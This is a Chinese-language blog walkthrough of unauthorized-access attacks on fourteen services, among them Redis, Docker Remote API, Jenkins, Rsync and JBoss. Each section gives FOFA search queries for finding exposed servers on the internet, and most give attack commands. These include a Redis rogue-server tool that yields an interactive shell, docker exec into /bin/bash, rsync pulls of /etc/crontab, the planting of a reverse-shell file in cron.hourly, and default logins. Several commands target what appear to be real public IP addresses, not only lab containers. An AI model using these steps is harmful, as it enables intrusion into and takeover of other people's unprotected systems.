当前位置: 首页 > news >正文

未授权访问复现

⼀、Redis未授权访问漏洞

进入vulhub目录使用以下命令启动靶机,或者在fofa里找一个网站去连。

fofa语句:port="6379" && banner="redis_version:6.2.7"
cd /vulhub-master/redis/4-unacc
docker-compose up -d
docker ps

在Kali上安装redis程序进行服务的链接


apt-get install redis
redis-cli -h 47.93.51.60 -p 6379

下载以下攻击项目:https://github.com/n0b0dyCN/redis-rogue-server

ls一下可以发现多了一个redis-rogue-server-master.zip,解压一下。

unzip redis-rogue-server-master.zip

执行以下命令获取目标的命令执行环境,交互时输入 i 键会获取Shell环境

python3 redis-rogue-server.py --rhost 47.93.51.60 --lhost 47.93.51.60

二、Zookeeper未授权访问漏洞

使用Fofa语法搜索资产信息。

port="2181" && "Zookeeper" && country="US"

在Kali中使用以下命令进行未授权访问漏洞测试 

echo envi | nc 192.248.225.1 2181

可使用Zookeeper可视化管理功具进行连接。

(https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip)

三、Jenkins未授权访问漏洞

使用Fofa语法搜索资产信息。

 port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

println "whoami" .execute().text

四、Jupyter NoteBook未授权访问漏洞

"Jupyter Notebook" && port="8888" && "terminals"

如果存在未授权访问漏洞则直接访问会直接跳到web管理界面,不需要输入密码。

新建⼀个终端,通过新建的终端可执行任意命令。

五、Elasticsearch未授权访问漏洞

 "Elasticsearch" && port="9200"

六、Docker Remote API未授权访问漏洞

 port="2375" && "docker"

使用-H参数连接目标主机的docker,使用ps命令查询目标系统运行的镜像。

docker -H tcp://13.222.146.134:2375 ps
docker -H tcp://13.222.146.134:2375 version
docker -H tcp://13.222.146.134:2375 exec -it 1f4 /bin/bash

七、Kubernetes Api Server未授权访问漏洞

port="8080" && app="Kubernetes"

在打开的网页中直接访问 8080 端口会返回可用的API列表。

八、Hadoop未授权访问漏洞

port="8088" && app="Hadoop"

开启页面直接访问不经过用户密码验证。

http://117.72.105.139:8088/cluster

九、ActiveMQ未授权访问漏洞

 body="ActiveMQ" && port="8161"

ActiveMQ默认使用8161端口,默认用户名和密码是 admin/admin。

http://47.99.115.236:8161/admin/

十、RabbitMQ未授权访问漏洞 

port="15672"      
port="15692"     
port="25672"

在打开的页面中可输入默认的账号和密码进行登陆,默认账号密码都是 guest。

http://bzgx.yuyiying.com:15672/#/

十一、JBoss未授权访问漏洞 

title="Welcome to JBoss" && icon_hash="-656811182"

拼接以下路径且无需认证直接进入控制页面

http://ip:port/jmx-console/
http://61.0.111.119:8080/jmx-console/

十二、Rsync未授权访问漏洞

在fofa中搜索该资产语法如下并在Vulhub中开启靶场

(port="873") && (is_honeypot=false && is_fraud=false)

出错了,去改一下版本,然后重新再启动一下。

vim docker-compose.yml

 

我们去kali里创建一个文件夹,下载敏感文件。

把我们的文件传到它的上面。

接下来将定时任务文件下载下来

rsync rsync://124.221.58.83/src/etc/crontab /tmp/tmp/crontab.txt

rsync rsync://47.93.51.60:873/src/etc/crontab /home/wangyibo/test

写一个反弹shell文件。

vim shell

rsync rsync://47.93.51.60:873/src/etc/cron.hourly

查看一下有没有shell,有shell的话等17分钟就可以监听到了。

十三、Dubbo未授权访问漏洞

 (app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

十四、Druid未授权访问漏洞

title="Druid Stat Index"
http://120.78.172.48/druid/webapp.html

Druid批量扫描脚本:https://github.com/MzzdToT/CVE-2021-3404

http://www.xdnf.cn/news/1205803.html

相关文章:

  • Python动态规划:从基础到高阶优化的全面指南
  • 未授权访问漏洞靶场(redis,MongoDB,Memcached...)
  • Unity_UI_NGUI_锚点组件
  • 项目如何按时交付?重点关注的几点
  • 【Linux操作系统】简学深悟启示录:Linux环境基础开发工具使用
  • GoLand 项目从 0 到 1:第三天 —— 图数据库版本管理方案调研与中间件部署
  • Dify-14: 工作流API端点
  • 在虚拟机ubuntu上修改framebuffer桌面不能显示图像
  • STM32F4—电源管理器
  • YOLOv11改进:添加SCConv空间和通道重构卷积二次创新C3k2
  • 时间数字转换器TDC的FPGA方案及核心代码
  • 数分思维10:用户增长
  • 小智源码分析——音频部分(二)
  • 机器学习sklearn:决策树的参数、属性、接口
  • mp核心功能
  • S7-200 SMART 通过本体 RS485 口与 DP01 上传 / 下载程序(网口故障)
  • Java项目:基于SSM框架实现的进销存管理系统【ssm+B/S架构+源码+数据库+毕业论文+远程部署】
  • 我从 Web2 转型到 Web3 的 9 条经验总结
  • 架构实战——互联网架构模板(“存储层”技术)
  • fchown/fchownat系统调用及示例
  • 坚鹏:AI智能体培训是知行学成为AI智能体创新应用引领者的基础
  • 3DGRUT: 革命性的3D高斯粒子光线追踪与混合光栅化技术深度解析
  • Item18:让接口容易被正确使用,不易被误用
  • 鱼皮项目简易版 RPC 框架开发(二)
  • JavaScript:10个数组方法/属性
  • ROS2入门之开发环境搭建
  • 【C++】手搓一个STL风格的vector容器
  • vue如何在data里使用this
  • 屏幕晃动机cad【4张】三维图+设计说明书
  • Java面试宝典:MySQL8新特性